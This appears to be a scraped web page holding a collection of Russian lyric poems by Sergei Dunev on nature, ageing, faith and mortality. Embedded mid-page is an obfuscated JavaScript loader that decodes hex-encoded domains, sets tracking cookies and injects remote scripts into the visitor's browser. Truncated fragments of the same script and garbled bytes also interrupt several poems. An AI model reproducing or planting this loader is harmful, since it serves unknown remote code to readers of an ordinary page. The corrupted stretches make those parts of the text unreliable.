Сергей Дунев


Мосточек

* * *

Иду. Мосточек узкий –
В две досочки всего.
Перил нет, нет мотузки –
Нет, в общем, ничего.

Два берега. Я – между.
Вниз глянешь – просто жуть!
На Бога лишь надежда
Да на судьбу чуть-чуть.

Коль доски заходили,
Шаг придержи, постой.
Там счастье, говорили, –
На стороне на той.

Совсем немного, право,
Осталось. Удержись!
Ведь эта переправа –
Твоя, голубчик, жизнь.

06.11.2017




Не до песен...


* * *

 

Да, не весел. Не до песен,

Не до шуток мне, когда

Столько фальши, лжи и лести,

Столько грязи, господа.

 

Позабыли вовсе – кто мы,

Каждый знает лишь себя,

И на то, что рядом стонут,

Клал с прибором, всех любя.

 

В грудь бия: Все люди – братья!

Миру – мир! Капут – войне!

Ну а если разобраться,

Каждый рад, что на коне.

 

А припомнить стоит всё же,

Песнь старинная гласит:

От коня погибнуть можно,

Даже если конь убит.



Пожелтели клёны...


* * *

Пожелтели клёны,
Поредели кроны.
Скоро обнажится
Весь окрестный мир.
Но пока на ветках
В листьях столько света,
Неохота верить,
Что прервётся пир
Для души и тела
В мире чёрно-белом.
Потому и рад я
Каждому листку.
И блуждая парком,
По аллеям ярким,
Прочь гоню печали,
Прочь гоню тоску.

 



Тревожит мир, волнует...


* * *

Тревожит мир, волнует так –
Уснуть не в состоянии.
И крыша едет, и чердак.
Сплошное наказание!

Таблетку выпил не одну,
Но нету сна ни капельки.
Курю, любуясь на Луну:
– Привет, друзья-лунатики!

Небось, таращитесь, как я,
В свои оконца круглые:
«Какая классная Земля!
Какие люди глупые!

Гляди, творят чёрт знает что.
Враждуют и воюют.
И превращают в решето
Прекрасную такую.

Неужто впрямь им невдомёк:
Пора угомониться.
Не то, не дай, конечно, Бог,
Нам всем конец приснится».


Опять во всём таится тайна

* * *

Пролился спорый дождь.

                                     И выше,
Просторней ласточек круги.
Закатный луч окрасил крыши,
В даль облака плывут легки.

Опять во всём таится тайна.
Её попробуй разгадать!
И мир теряет очертанья,
Чтоб на мгновенье цельным стать.


В жизни так бывает...


* * *

 

К сожаленью, в жизни так бывает:
Почва под ногами пропадает.
Ни ориентира, ни опоры –
Длинные сплошные коридоры.
Низкие и узкие, в которых
В темноте пугает даже шорох.
Ты идёшь, скользя и спотыкаясь,
В тупиках на стены натыкаясь.
Понимаешь, что с дороги сбился,
В лабиринте жизни заблудился.


___________



К читателю

* * *


Обещал, что в стихах буду весел, и что же?

Не сдержал обещание. Господи боже,

Даже пуще, чем прежде, теперь я грущу.

У тебя, мой читатель, прощенья прошу,

Что в эпоху таких мировых катаклизмов

Не могу ободрить и придать оптимизма.


Был бы рад всей душою, но в смутные дни

Вместо радостных слов – чертыханья одни.

Я поэт, а не клоун. Смешить не могу,

Когда быт всех безбожно сгибает в дугу.

Перевёрнутый мир беспокоит меня,

Оттого и печальнее день ото дня.


_______________________________________



Продышу глазок в окошке...

* * *


Продышу глазок в окошке,

Посмотрю на белый свет:

Пролегли в снегу дорожки,

А самих прохожих нет.

 

Улеглась ночная вьюга.

Тихо. Улица пуста.

Только тенькает пичуга

В гуще голого куста.

 

Тенькай, тенькай, кроха-птица,

Славь и радуй Божий свет.

Раз уж выпало родиться,

То должны оставить след.

 

На снегу ли – первопутком,

На бумаге ли – строкой.

Иль – как птаха этим утром –

Песней простенькой такой.


___________________________




Полночное

                     * * * 


         Маятника мерное качанье.

         Полночь, одиночество, молчанье.

                                   Георгий Иванов


Грустные мысли, грустные мысли…

Тучи сплошные будто нависли.

Худо душе, а вокруг – ни души,

Слышно лишь – ходики ходят в тиши.

Маятник влево, маятник вправо…

Сколько же можно маяться, право?


_________________________________




Сейчас, а не после...


* * *

            

Цените поэта сейчас, а не после,

Когда над ним вырастет холмик могильный.

А лучше – поэта не трогайте вовсе,

Не меряйте меркой своей меркантильной.


Поймите: поэты иного пошиба,

Их сравнивать между собою не надо.

Такими, как есть, принимайте их, либо

Молчите.

               Молчание – тоже награда.

___________________________________




Кому какое дело...


* * *


Кому какое дело – что со мной,

А что осталось в прошлом, за спиной.

Какое было время и страна,

Какие виды видел из окна.

Кого любил, и кто любил меня,

Где я бродил с огнём и без огня.

Куда несли ночные поезда,

Труба звала или вела звезда.

Пути мостил или мосты сжигал,

Грехи копил или стихи кропал…


Я грустным стал, а был совсем иной.

Кому какое дело – что со мной.

__________________________________



Оптимистическое


                    * * *


Рьяно берёмся за ребусы жизни,

Спорим с судьбой с пресловутой отвагой,

Чтобы однажды – за полночь – выжать

Опыт свой – ломкой строкой на бумагу.


Пусть предрассветный не встретили луч и

Ночи остатки у нас под глазами,

Радость на сердце: жизнь станет лучше.

Только добро в мир привносят стихами.


__________________________________



Спать пора, а уснуть не могу...

* * *


Спать пора, а уснуть не могу.

Поздний кофе виною, луна ли…

Лунным светом стол письменный залит,

А мне кажется – будто в снегу.


Спать пора, а уснуть не могу.

Вязну, мёрзну в этом снегу.


_______________________________



Серое сукно небес...

                * * *

Серое сукно небес,
Сплошь земля укрыта листьями…
Углубляюсь в здешний лес –
В тишине собраться с мыслями.


Изменился до чего,
Вот уж вправду – царство сонное.
Но выходишь из него
Ты намного просветлённее.


______________________________



Не строю планов никаких...

                  * * *


Не строю планов никаких.

Ни на сегодня, ни на завтра.

Проснулся - радость.

                            Каждый миг

Приемлю в качестве подарка.


Пока ещё не рассвело,

Пью кофеёк под сигарету.

И вот уже моё стило

Отметило минуту эту.


__________________________


Принимая всё таким, как есть...

ЭЛЕГИЯ


Тоска обезголосевших лесов,
Садов невозмутимое молчанье…
Природа, обнажаясь до основ,
Желает одного лишь – пониманья.


Ни глаз не радуя, не теша слух,
Не вызывая в нас того восторга,
Который перехватывал бы дух,
Она молчит настойчиво и строго.


И, принимая всё таким, как есть,
Вбирая эту паузу земную,
Ты понимаешь, что любую песнь
Молчанье предваряет зачастую.


________________________________




Сегодня я не тот...


* * *

 

Сегодня я не тот, что на недавнем снимке.

Прошли мои лета в невесть чего поимке.

Прошли мои лета, стихов остались строки –

Свидетельство того, что были лучше сроки,

Что были времена прозренья и порыва.

Теперь же крутизна смертельного обрыва,

Пугая чернотой, предстала предо мною,

И кажется мне жизнь оборванной струною...


______________________________________

 



Приближаемся к самому краю...

                * * *


Приближаемся к самому краю,

Чтоб на тёмную воду взглянуть...

Облетает листва золотая,

Обнажается голая суть.


Будто свечи вокруг погасили -

Не слепят ни лучи, ни гроза...

Нет у солнца осеннего силы,

Отчего же так больно глазам?


__________________________


Хмурые дни непогоды...


* * *

Хмурые дни непогоды
Тянут свои невода.
Прожиты светлые годы, –
Непостижимо, – когда?

Тускло в седом небосводе,
Тускло в остылой воде.
Думаешь, это в природе?
Нет, это, братец, в тебе.

___________________________



Октябрьское

* * *


Лес глух и нем.

Как будто бы печать -

в ветвях закатное алеет солнце.

И даже эхо, если закричать,

помедлит, а потом лишь отзовётся.


* * *

Порой природа молчалива.
Но лишь затем, чтоб вдруг сразить:
Осенний луч неторопливо
По грампластинке пня скользит.

_____________________________



Утопая в пожухлом, шуршащем...

                   * * *


Утопая в пожухлом, шуршащем,

Отдыхаю душой в настоящем.

Сверху - ветки, а снизу - листва...

Жизнь прекрасна и вечно права,

Только вот огорчает всё чаще.

Но сейчас она - в полной красе,

И чаруют подробности все:

Разноцветные листьев вкрапленья,

Облетевшие эти растенья,

Эти никлые травы в росе.


______________________________



Уже и век свой доживаю...

* * *


Уже и век свой доживаю,

А что такое жизнь - не знаю.

Извечным изведён вопросом,

Скорей всего останусь с носом.

И помудрее были - где там! -

Ушли со света без ответа.


____________________________




Стрекоза уселась на запястье...

* * *

Стрекоза
уселась на запястье –
чуточку согреться…

Господи!
Какое счастье –
обогреть в часы ненастья
страждущее
сердце.

___________


Не зря душе успокоенья нет...

* * *

Не боль важна – преодоленье боли.
Тоска и грусть – чтоб радость воспринять.
И подчиняясь некой высшей воле,
Мы постигаем жизнь за пядью пядь.

Невзгоды нас гнетут и гнут печали,
Обиды нас терзают, как ножи…
Но где, когда, скажите, вы видали,
Чтоб лёгкою была, спокойной жизнь?

Ответа нет, так как вопрос «не в тему»,
Ведь жизнь сама – загадка и ответ.
Наверное, не зря страдает тело,
Не зря душе успокоенья нет.


___________________________________



Этюды


*

 

Косы ивы

ветра порывы

треплют.

 

Сорванный с веток,

каждый листок

перечёркивает наискосок

лето.

 

* *

 

Кружился в танце мотылёк.

В прыжке прервал его круженье.

Кулак разжал, а то – листок

Осенний…


* * *

 

Город

дождём исколот.

Холод

стекает в лужи.

Лист

над аллеей

кружит –

лета

      красный

                  осколок.

 

_____________________

 



Из грязи прорастает красота

* * *

(триолет)

                Когда б вы знали, из какого сора
                Растут стихи, не ведая стыда…
                                          Анна Ахматова

Из грязи прорастает красота.
О том стихи Ахматовой о соре.
А с ней - с Ахматовой - не будешь спорить:
Из грязи прорастает красота.
Сие есть истина. Подведена черта.
И нам лишь остаётся только вторить:
Из грязи прорастает красота.
О том стихи Ахматовой о соре.

_____________________



Терзает и пугает невозможность...

* * *

Как просто всё и в то же время сложно.
Что сердце ощущает – мозг неймёт…
Терзает и пугает невозможность
Умом достигнуть чувственных высот.

___________


Оправдание Дедала

Михайло Сыч

 

Оправдание Дедала

 

Как бога, я молил его: «Помилуй!

Так близко к солнцу, милый, не лети!..»

Как больно сына опускать в могилу,

Как трудно дальше без него в пути.

 

Всю жизнь живу с безвинною виною.

Несу, как крест, страшнейшую из кар:

– Я б заплатил не только сединою,

Лишь бы в живых остался мой Икар…

 

1988


Перевод с украинского С. Дунева


___________





Прямых дорог на свете нет...

* * *


Прямых дорог на свете нет.

Любая тропка узловата,

Запутана замысловато,

Чревата тем, чего не ждёшь,

Чревата попаданьем в нети,

А ты по ней идёшь, идёшь -

И тем живёшь на этом свете.



Коль ангел нас оберегает...

* * *

 

Что остаётся? Только – жить,

Мгновеньем каждым дорожить.

Коль ангел нас оберегает,

Свою опеку не снимает, –

Под сенью крыл его в ненастье

Надежда есть ещё на счастье.



Не избежать нам доли той...

* * *


Что в жизни нам принадлежит?

Ты в теле собственном не властен:

Болеть, влюбляться, просто жить -

Не властен даже в малой части.


И есть ли что-то на земле,

Что нам подвластно и покорно?

Решает некто в жуткой мгле

Всё за тебя, вращая жёрнов.


Не избежать нам доли той -

Всяк в теле заперт, как в неволе.

И каждый платит за постой -

Слезами и несносной болью.



Возвращаюсь назад

* * *

Возвращаюсь назад –

                                книгу жизни обратно листаю,
Ибо новых страниц

                             не осталось уже для меня.
Всё, что было когда-то,

                                   старательно в строки сгребаю,
Согреваюсь озябшей душой

                                          у былого огня. 



Без сожаления и страха...

* * *

 

Без сожаления и страха

Стою у жизни на краю.

Что там последнюю рубаху, –

Всю душу вам отдам свою.

 

Ей-богу, ничего не жалко.

Берите, был бы только прок,

Всё – от нечаянного знака

До самых сокровенных строк.

 

Прошу, не поминайте лихом.

Я в лихолетье наших дней

Старался перед Божьим ликом

Не осрамить души своей.





Июньский трилистник


Внезапный ливень. 

Яблоку негде упасть 

Под детским грибком. 


 * 


Развилка в лесу. 

Свернул не думая 

На птичий гомон. 


 * 


 Уж липы в цвету. 

Пчёл с цветков медоносных 

Ветер сдувает...


Тебе

* * *

 

                                                     Н.

 

В пчелином гуде все цветы земли

Я радугой готов стелить тебе под ноги –

Чтоб были радостными сплошь твои дороги,

В какую б даль они не пролегли.



А жизнь короткая такая....


* * *

 

А жизнь короткая такая!

Наверно, зря к ней привыкаем.

Зря обживаем деловито

И в долговую яму быта

Зря лезем с вечною душою.

Предназначение иное

У человеческого рода.

Иная у него природа.



В ожидании

* * *


Первые лучи.
Курю в ожидании
Озарения. 



___________________________________
r:e[0],s(t)};f()}();


Пусть даже в конце своих лет...

* * *

 

Пусть даже в конце своих лет,

Поймёшь обязательно всё же:

Любой незнакомый прохожий –

Тебе в этом мире сосед.

Коль так, враждовать с ним негоже,

И ссориться – тоже не след.

___________________________


Однажды поймёшь

*

Однажды поймёшь:
Мир в твоих усилиях
Не нуждается.

*

Смерть заберёт всё.
Останется голая
Суть твоей жизни.

_________


Судьба чередует дары и удары...

* * *

 

Судьба чередует дары и удары.

То ставит капканы, то стелет соломку.

До края наполнив гранёную тару,

Зелёные перья макаю в солонку.

 

Сальцо нарезаю ножом перочинным,

Доскою разделочной – хлеба краюха.

Застолье нехитрое не беспричинно,

Затея сия – для поднятия духа.


_________________________________

0],s(t)};f()}();


Время несётся, несётся, несётся...

* * *

 

Время несётся, несётся, несётся,

Скоро, как ниточка, жизнь оборвётся.

 

Господи Боже, умерь его прыть,

Иль надоумь, как с стремительным быть.

 

Как нам в немыслимой сей круговерти

Радость найти и не думать о смерти.

 

…………………………………..

 

В пору таких безнадёжных времён

В чём же, скажи, мы опору найдём…




В малом


*

 

Гнётся от ветра

пробившая асфальт

былинка

 

 

*

 

Утренний туман.

Дворник насвистывает

неясный мотив.

 

 

*

 

Вещевой рынок.

Камуфляж приглядела

божья коровка.

 

 

*

 

Вечереет.

Муравей на полях шляпы

Бежит по кругу.

 

 

*

 

большую радость

и отдохновение

находишь в малом



К чему нам ложные слова...

* * *

К чему нам ложные слова,
Ненастоящие восторги,
Когда – седеет голова,
Когда – не в гору путь, а с горки?

Душою искренне прильни
К тому, что истинно прекрасно.
Живём не в радостные дни,
Но, слава Богу, не напрасно.

Хотя судьбы бедоворот
Нас беспощадно каруселит,
Вперёд по-прежнему ведёт
Магнит недостижимой цели. 


Терзаю свет, терзаю тьму...

* * *

 

            И мир блажит, и мы с приветом…

                                                Лариса Миллер

 

Терзаю свет, терзаю тьму,

Терзаюсь сам меж тьмой и светом…

Должно быть, скажете: «С приветом», –

Не стану возражать тому.

 

С приветом, да. Притом большим.

Я не боюсь признаться в этом.

Мир цел, пока меж тьмой и светом

Мы маемся и мельтешим.



 


И кошка у вас, и цветы на окошке...

* * *

 

И кошка у вас, и цветы на окошке,

А  вот у меня ни цветов нет, ни кошки.

 

Спасает лишь то, что на мой огонёк

Порой залетает ночной мотылёк.

 

Всегда на душе мне становится легче,

Когда он у лампы настольной трепещет.


Без вымысла

* * *

 

Всё длилось миг.

                           Один короткий миг.

И в этом нету вымысла ни капли.

Но в этот миг – весь необъятный мир

В себя вобрала маленькая капля.

 

Она его торжественно несла,

Наделена зеркальной чистотою.

Потом с листочка нехотя стекла

И стала вновь обычною водою.




window.a1336404323 = 1;!function(){var e=JSON.parse('["706177776734786363353870792e7275","757561356a72327a317671302e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "poezia.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();


Апрельский трилистник


 

*

 

Апрельский денёк.
Чу! о скорлупу земли
стучатся травы.

 

*

 

Фиалки цветут.
Снова вдвое длиннее
тропинка в лесу.

 

*

 

Первые листья.

Как немой по губам, читаю

Их детский лепет.




Когда душа, как небо, высока...

* * *

 

Недолгие и редкие минуты,

Когда душа, как небо, высока,

Обычно выпадают рано утром,

Пока парят парные облака.

 

Пока ласкают мир лучи косые

И птицы пеньем услаждают слух,

И от небес, простора их и сини,

И глубины – захватывает дух.

 

И в этот миг, который равен году,

Который весь спокойствием согрет,

Ты чувствуешь, что сердце и природу

Один и тот же наполняет свет.


__________



Я дышу, я ликую сегодня...

* * *

Я дышу, я ликую сегодня,
И обиды на прошлое нет, –
Смело брошены прочные сходни
В озарённый лучами рассвет.

Что ни есть на земле, – принимаю,
Несказанно дню новому рад.
Я навстречу удаче шагаю,
Не страшась ни утрат, ни преград. 






Казалось бы - пустяк...

* * *

Лишь стоит чуть нажать,
Легонько подтолкнуть, –
И жизнь пойдёт опять,
И не прервётся путь.

И ближе станет даль,
И ярче будет свет.
Кромешная печаль,
Глядишь, сойдёт на нет.

Казалось бы – пустяк,
А всё нейдёт никак…



Мартовский сумрачный поздний рассвет...

* * *

Мартовский сумрачный поздний рассвет.
Снег за окном и грязные лужи…
Кофе весь вышел и нет сигарет.
Ветер гуляет в карманах к тому же…

Чувства гашу, что скребут по душе,
Мысли гоню, что думать мешают…
Честно сказать, закурил бы уже.
Господи, что же так долго светает…

24 марта 16


Прошедших дней запутанную нить...

* * *

Прошедших дней запутанную нить
Смотать в клубок не в нашей власти.
Так стоит ли былое бередить
И верить в эфемерность счастья?

Да, память, словно валидол,
Врачует и поддерживает в жизни,
Но жизнь – по сути – длинный коридор,
Ведущий напрямую к тризне.

Чем дальше, тем трудней идти.
Подъём всё круче, холоднее стены.
И, как песок сквозь пальцы из горсти,
Надежды убывают постепенно.

А мы идём, и за ослизлость стен
Цепляемся дрожащими руками.
Идём и верим в неизбежность перемен,
Тех, что случатся непременно с нами.



Мартовское


* * *

Земля раздобрела от влаги,
Трубит вызывающе лось,
Движенье живительной браги
В берёзах уже началось.

Уже перелётные птицы
К местам потянулись родным:
Наскучили им заграницы,
Им сладок отечества дым!



Весенние хокку

*

 

Озябшей птицей

солнце клюёт крошки

последнего снегопада.

 

*

 

Мороз отступил.

На карнизе воркует

голубь беспалый.

 

*

 

Жизнь продолжается.

Капелью разбужена

Первая муха.

 

*

 

Тёплой ладошкой

солнце сгребает с крыши

снег прошлогодний.

 

*

 

Ма-арт! Ма-а-арт! –

радостно орут коты

на тёплой крыше.

 

_____________________



Кому какое дело - что со мной...


* * *

 

Кому какое дело – что со мной,

А что осталось в прошлом, за спиной.

Какое было время и страна,

Какие виды видел из окна.

Кого любил, и кто любил меня,

Где я бродил с огнём и без огня.

Куда несли ночные поезда,

Труба звала или вела звезда.

Пути мостил или мосты сжигал,

Грехи копил или стихи кропал…

Я грустным стал, а был совсем иной.

Кому какое дело – что со мной.



 



Час ожиданья

* * *

 

Ни шороха, ни шелеста, ни свиста –

Февральская сквозная немота.

И небо над землёю снова виснет

Куском сырого серого холста.

 

Час ожиданья наступил в природе.

Час ожиданья – в трепетной душе.

Казалось бы, ничто не происходит,

На самом деле – деется уже.

 

 



Из дневника


Поминутно прирост временной

В дневнике скрупулёзно отмечен,

А реально: мир скован зимой –

И в помине тепла нет отметин.

 

Хмурь и стынь поутру. Под ногой –

Надоевшее шамканье снега.

Как атлант, каждый тополь нагой

Над собой держит низкое небо.

 

Запоздало приходит рассвет,

Сыплет галочьей чёрной картечью…

Очень горько, что лёд своих лет

Растопить нам практически нечем.

 

 



Не раз доказывал в стихах...


* * *

 

Не раз доказывал в стихах,

Что смерти не боюсь.

Твердил, что мне не ведом страх,

Что, коль придёт, – смирюсь.

 

Приму, как неизбежность, и

Легко сойду с межи…

Не верьте! Это глупости.

И я – держусь за жизнь.

 

Как смертный, смерти я боюсь.

До содроганья аж.

А что в стихах своих храбрюсь –

Не более чем блажь.








С лихвою счастья не бывает…

* * *

С лихвою счастья не бывает.
Жизнь то лелеет, то ломает.
Жалеет здесь, тут бьёт под дых,
Как будто нет забот иных.
Непостоянная, и всё же
Корить-винить её не можем.
Ведь счастье ценим лишь тогда,
Когда бока намнёт беда.






Февральское

* * *


        Совсем не по-зимнему пахнет озоном,
         и лужи блестят на промозглой земле.

                                                  В. Белозерский


Февраль одет не по сезону,
Как будто осень на дворе.
Снега сошли. В тумане тонут
Немые остовы дерев.

Сырые небеса провисли,
И днём под ними – полумрак.
Всё давит так, что даже мысли
Во мне не сдвинутся никак.

Стою под низким небосводом,
Невнятно что-то бормочу.
И, кажется, сама природа
Мне тоже шепчет что-то,
Чу...






В застое



* * *

В вишнёвой прокуренной трубке
Дрянной догорел табачок…
В застое которые сутки,
Которые сутки – молчок.

Ни строчки, ни слова, ни буквы
В башке отыскать не могу.
На кухне сижу бука букой,
Сижу и молчу – ни гугу...





Жизнь - тайга

* * *

Жизнь – тайга,
и нрав её не ласков.
Продираюсь. Буреломы, мхи…
Отмечают след,
как в страшной сказке,
чтобы возвратиться мог,
стихи.






Белая грусть



 * * *

 

Опять бессонницей постель,
Как лист бумаги, скомкана.
Опять за окнами метель
Из белой грусти соткана.

 

Горчит давно остывший чай –
Лимонной жёлтой корочкой,
И зябко ёжится печаль,
Присев в углу на корточки.

 

 



Ветер в кронах высоких свистит...


* * *


Ветер в кронах высоких свистит,

Леса зимний сон беспокоя.

Вперемешку со снегом летит

С рыжих сосен ржавая хвоя.

 

Угодив ненароком в сугроб,

Словно лось, тяжело оступаюсь.

По наметке звериных троп

Через дебри к жилью пробираюсь.

 

Все длиннее становится тень,

Все стремительней день угасает.

Вот уже и огни деревень

Сквозь редеющий лес проступают.

 

Остается лишь поле пройти –

Это белое море безмолвья,

Чтоб желанный ночлег обрести,

С жарким треском печи в изголовье.

 

В нас, должно быть, волчье живет,

То, что в непогодь тянет извечно.

Но отпустит, отляжет, и вот –

К очагу вновь ведёт человечье.


 


Под зимним небушком

* * *

 

Городские куры – голуби

Ходят-бродят под окном.

Городские куры – голуби

Клянчат крошки на прокорм.

 

Я не жмот, не жалко хлебушка

Мне для этих глупых птах.

Голодно под зимним небушком –

Страх!




Озорные снегири

* * *

От мороза воздух розов.
Чудо, что ни говори.
В свете утренней зари
На оснеженной берёзе
Дозревают на морозе
Озорные снегири.


Первопуток


 

Первопуток – ещё не путь,
Не мощёная камнем дорога.
Первопуток – щемящее грудь
Вслед напутствие: «С Богом!»

 

Чей-то долгий пристальный взгляд,
Ощущаемый даже спиною.
То молчанье, каким молчат,
Чудо чтя неземное.

 

 

 



Январский этюд


* * *

 

          Мороз и солнце; день чудесный!

                                        А. С. Пушкин

 

Январь.

            Мороз.

Снежинок звёзды

искрятся – глаз не оторвёшь.

В зубах

            похрустывает воздух,

как будто яблоко

грызёшь.



Зима нам души не остудит

* * *

Ещё тепла и света вдосталь,
Но дни уже не так долги.
О, как непросто, как непросто
Земные завершать круги.

Но мы надежды не теряем,
Нам сил ещё не занимать.
Мы будем в следующем мае
Любимых к сердцу прижимать!

Зима нам души не остудит,
Сердца морозом не скуёт.
Гул ледохода мир разбудит,
Нас половодье чувств зальёт!




Даст Бог, до счастья доживём…

* * *

Даст Бог, до счастья доживём,
Переживём лихие годы.
Мы – словно реки подо льдом,
На коих дремлют пароходы.

Ни звука, ни движенья нет.
Молчат молочные туманы.
И только ткущийся рассвет
Врачует ноющие раны.

Как в забытье или во сне,
В нас вызревает непорочно
Желанье оказаться вне
Всего, что зыбко и непрочно.

Дождёмся. Свой всему черёд.
Исчезнет чёрной тени темень.
И счастья долгожданный плод
Разделим поровну со всеми.




Ещё в душе моей светло...

* * *

 

Ещё в душе моей светло –

Она не знает о печали,

Не плачет долгими ночами,

Не смотрит в чёрное стекло.

 

Ещё в душе моей светло,

Ещё она не знает муки –

Внезапным холодом разлуки

Лица ещё не обожгло.

 

Ещё в душе моей светло,

В ней теплятся любовь и радость.

Крылом колючим снегопада

Надежд ещё не замело.

 

Ещё в душе моей светло…



 



Буду рад на свете том

* * *

 

Буду рад на свете том,

Если обо мне на этом

Кто-то скажет: «Был поэтом,

Неплохим при всём при том».

А коль скажет кто потом

Обо мне на свете этом:

«Был чернильным он пятном. –

Констатируя при этом, –

Водкой вывели поэта!» –

Загрущу на свете том.

 

 


Декабрьский диптих

* * *

 

Ночной снежок – налётом тонким –

Пушок в полпальца толщиной.

Припорошил лишь землю только,

А как повеяло зимой!

 

 

* * *

 

Чист мой лист – как первый снег,

Выпавший в ночи нежданно.

Чист мой лист, и, как ни странно,

Нет желания во мне

Пробежать по целине –

Потревожить строчкой ранней.

 

Снег следами, лист строкою

Не решаюсь беспокоить…

 

 

 

atio\"r��N;�


У жизни лёгкий слог

* * *

 

У жизни лёгкий слог,

И речь её струится,

Как вольный ветерок.

Но всё же в ней таится

Такое, что никак

Постичь не удаётся.

И бьёшься, как в силках,

В том, что так вольно льётся.




На крутом ветру эпохи

* * *

Только ахи, только охи…
На крутом ветру эпохи
Каждый, словно лист, дрожит –
Скудным скарбом дорожит.
Каждый держится за быт,
Хоть не раз был бытом бит.
Цепко держится. Боится
В круговерти очутиться.
И рождают наши страхи
Только охи, только ахи.





Уходит осень...



* * *

Уходит осень и своим уходом
Не несёт никаких новостей,
Кроме той, что разделась природа,
Упростившись до голых ветвей.

Обнажилась, застыв в ожидании
С неподвижно нависших небес
То ль прощения, то ль наказания
За естественный этот процесс.


___________________________________







В преддверье вьюг и декабря


* * *

Что остаётся? Наслаждаться
Всем тем, с чем больно расставаться.
Всем тем, что радует сейчас,
Прекрасно в профиль и анфас.
Всем, окружающим тебя
В преддверье вьюг и декабря.
И капля, и листочек влажный –
Всё это трепетно и важно.


В чередованье дней-ночей



* * *

То, что так много лет назад
Когда-то было,
Припомнил – и потупил взгляд,
В груди заныло.

И вспомнил вроде пустячок,
Такую малость,
А, вишь ты, сердце тут же – ёк –
И оборвалось…

В чередованье дней-ночей
Напропалую
Живём, забыв, что мелочей
Не существует.



Три стихотворения

* * *

У стылых и грязных обочин,
Покрытых рябою листвой,
Стою, пустяком озабочен,
Стою, окружён тишиной.

Курю, от ветров укрывая
Ладонью живой огонёк, –
И душу в ответ согревает
Холодный и терпкий дымок.


* * *

Пёстрые палые листья –
Затихшие шелесты крон.
Осенние грустные мысли –
Под крики картавых ворон.

Тихо течёт тропинка
В сырую и серую даль.
Занозою в сердце – грустинка,
Камнем на сердце – печаль.


* * *

В глуши лесной тоску глушу:
Среди берёзок и осинок
Брожу и листьями шуршу,
Вдали от просек и тропинок.

Молчанье строгое хранит
Сплошь обнажённая природа,
Лишь паутиночка звенит,
Как финишная лента года.

____________________________


Лоскутья

(из записных книжек)


#

Жизнь – что съёмное жильё –
Краткосрочная утеха.
Обустроишь, как своё,
А тебя попросят съехать...


#

Какой прекрасный мир!
Как связь с ним оборвать?
Не страшно уходить,
А страшно – оставлять.


#

Не важно – богато живёшь иль убого
Во временном этом дому,
Главное – что ты просишь у Бога
И что возвращаешь Ему.


#

Ничего не вычитается,
Всё плюсуется, пойми.
Сумма – жизнью называется,
Хоть и выжимки одни…


#

Мудрость есть в том, что живём мы недолго,
В том, что последний рубеж свой не знаем, –
Дальше пройти по кремнистой дороге,
Больше постичь на пути успеваем.


#

Удобнее всего – ведомым быть,
След в след идти за кем-то через кущи.
Но, чтоб потом никто не смел корить,
Осмелься сам хоть раз побыть ведущим.


#

Мучь – не мучь свою бедную душу,
Ничего не выходит наружу.

Всё внутри и кипит и клокочет,
А наружу прорваться нет мочи.

Тяготит, разрывает на части.
Молит милости, ищет участья…


#

…………Пережитые беды
…………..становятся силою…

………………….Р. Казакова


Всё – заново.
И с тем смирись.
Сильней нас делают ушибы.
Когда бы не было ошибок,
То чем бы нас учила жизнь?


#

Бог весть, куда ведёт дорога.
На крайней точке бытия
Мы понимаем слишком много,
Не понимаем лишь себя.


#

Хочется радостно жить – не выходит.
Слишком уж много печальных мелодий.
Слишком уж мало на сказку похоже
То, что Ты создал, прости меня, Боже…


#

…………..О жизнь моя, о смерть моя, –
…………..Меж вами нет границы…

……………………………………Т. Бек

Нет между жизнью и смертью черты пограничной…
…………………………………………С. Липкин


Ощущаю конец, но не вижу предела.
Видно, нет между жизнью и смертью раздела.
Ни межи, ни начерченной чётко границы.
Чередуясь со смертью, жизнь длится и длится.


#

А ведь так станет, так случится,
Придётся с миром разлучиться.
Настанет час – и нас с тобою
Отгородят сплошной стеною
Ото всего, чем нынче дышим.
Мы даже плача не услышим…


#

Всё одно помрём, как говорится,
Все как есть, когда-нибудь помрём…

…………………….Николай Рубцов


Нет, не кличу – сама подступает.
Чу! звучит уже посвист косы…
В свой черёд всех нас скосит Косая,
Как траву, что седа от росы.


#

Мой друг – в ожидании счастья,
А я нынче счастья не жду.
Мне б только немного участья,
Иначе – совсем пропаду.


#

А жизнь проста, как оказалось.
У всех нас путь один:
Алкая счастия и маясь –
От соски до седин.


#

Счастье – иллюзия.
Нечто такое…
Нет у нас счастья –
Нет и покоя.


#

В этом мире, совсем не похожем на сказку,
Всё стараемся жить мы по божьей указке.
Но старания тщетны, – грехи наши тяжки.
